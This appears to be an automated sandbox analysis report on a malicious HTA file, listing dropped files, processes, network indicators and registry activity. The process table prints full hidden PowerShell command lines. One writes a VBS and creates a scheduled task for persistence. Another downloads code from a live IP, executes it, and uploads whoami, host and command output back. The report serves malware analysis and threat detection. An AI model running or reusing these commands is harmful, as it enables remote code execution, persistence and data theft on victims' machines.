C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionary0c00.lex
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QL6N3396JOR7QCQG7O4L.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\MSkUffzfPy.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c kill -name mshta;$a='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';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content $home\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs -value $c;schtasks.exe /create /TN SearchUpdateTaskMachineCore /SC minute /mo 4 /tr $home\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs /f;;;;$temp='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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\\appdata\local\\temp\\623-6341-11.docx -value $fil -encoding byte;&$home\\appdata\local\\temp\\623-6341-11.docx;
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /TN SearchUpdateTaskMachineCore /SC minute /mo 4 /tr C:\Users\user\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs /f
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page114',$drpy);}
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page114',$drpy);}
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\623-6341-11.docx" /o ""
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://2.59.222.98:43820/SZqGnpR
unknown
malicious
http://2.59.222.98:28402/page114
unknown
malicious
http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt
2.59.222.98
malicious
http://2.59.222.98:43820/SZqGnpRL
unknown
malicious
http://2.59.222.98:43820
unknown
malicious
http://2.59.222.9
unknown
malicious
http://2.59.222.98:28402/page114Bytestf8.GetBytesesX
unknown
http://2.59.222.98:28402/page114X
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://github.com/Pester/Pester
unknown
http://2.59.222.98:43820(
unknown
http://schemas.opez
unknown
https://g.live.com/odclientsettings/Prod-C:
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://g.live.com/odclientsettings/ProdV2-C:
unknown
https://nuget.org/nuget.exe
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://go.microsoft.coyy
unknown
http://2.59.222.98:43820/szqgnprlfqiycdkb/page114/upgrade.txt
unknown

IPs

IP
Domain
Country
Malicious
2.59.222.98
unknown
Ukraine
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
?a!
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Wizards
PageSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\MailSettings
Template
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
AutoRecoverySaveIntervalMetadata
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
Language
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
EcsRequestPending
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
FirstRun
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
ACUpdated
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
DefaultKerningLigatures
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride
{30CAC893-3CA4-494C-A5E9-A99141352216}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData
winword.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\WEF
Word_RequireForceRefreshAtBoot
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
}k!
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru
FOLDERID_Desktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru
FOLDERID_Documents
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU
FOLDERID_Desktop
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU
FOLDERID_Documents
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\24184
24184
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word
WordName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock
FileTypeBlockList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock
OoxmlConverterBlockList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
BuildNumber
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
Expires
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.5
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.6
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.7
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.9
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.10
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.11
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.13
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.14
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.15
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.16
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.17
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.18
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.19
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.20
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.21
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.22
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.23
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.24
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.25
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.26
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.27
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.28
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.29
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
1.30
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
VersionId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
ETag
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
DeferredConfigs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
ConfigIds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTimeWord
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTimeWord
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
UpdateComplete
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile
MsaDevice
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851216
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328884
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03090430
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457444
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033917
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328893
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328905
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851217
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328908
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033919
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328916
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033921
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457464
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033925
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM03998158
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM01840907
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457475
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM10001114
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851218
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851219
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851220
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851221
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328919
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851222
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM03998159
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328925
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851223
